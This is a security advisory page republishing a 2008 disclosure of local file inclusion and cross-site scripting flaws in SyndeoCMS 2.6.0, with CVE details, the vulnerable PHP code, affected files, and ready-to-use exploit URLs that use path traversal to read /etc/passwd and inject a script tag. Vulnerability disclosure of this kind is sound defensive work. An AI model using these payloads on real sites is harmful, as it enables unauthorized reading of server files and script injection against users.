SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Syndeo CMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities


Arrow  SecurityAlert : 4660
Arrow  CVE : CVE-2008-5272
Arrow  CWE : CWE-22
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : Yes
Arrow  Exploit Available : Yes
  ExploitAlert :   4063
Arrow  Credit : CWH
Arrow  Published : 02.12.2008

Arrow  Affected Software : syndeocms:syndeocms:2.6.0



Arrow  Advisory Content :  

===========================================================
SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team
..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'


AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : SyndeoCMS
VERSION : 2.6.0 (Lastest Version)
DOWNLOAD : http://downloads.sourceforge.net/syndeocms
#####################################################

---LFI---

#################################################################
Vulnerable Code:
if (IsSet ($_GET['template']))
{
$template_path = ...;
$filename = $template_path . "/" . $_GET['template'];
if (file_exists($filename))
{
$handle = fopen($filename, "r");
$content = fread($handle, filesize($filename));
fclose($handle);
}
}
#################################################################

Vulnerable File:

[+] starnet/editors/fckeditor/studenteditor.php
[+] starnet/modules/sn_news/edit_content.php
[+] starnet/modules/sn_newsletter/edit_content.php

Exploit:

[+]
http://[target]/[path]/starnet/editors/fckeditor/studenteditor.php?template
=../../../../../../../../../etc/passwd
[+]
http://[target]/[path]/starnet/index.php?option=modulemanager&module=16&mod
option=edit_article&cat_id=1&article_id=0&template=../../../../../../../../
../../../../../etc/passwd
[+]
http://[target]/[path]/starnet/index.php?option=modulemanager&module=17&mod
option=edit_newsletter&newsletter_id=1&edition=1&template=../../../../../..
/../../../../../../../etc/passwd

Note: - the first link requires pupil session (normal student
session)
- the second link and the third link require admin session


---XSS---

[+] index.php

Example:

http://[target]/[path]/index.php?page=1§ion="><script>alert(111);</scri
pt>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################

update:
see: http://www.syndeocms.org/forum/index.php?topic=1788.0



Arrow  References :

http://securityreason.com/expldownload/1/4063/1 (Exploit)
http://secunia.com/advisories/30602




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.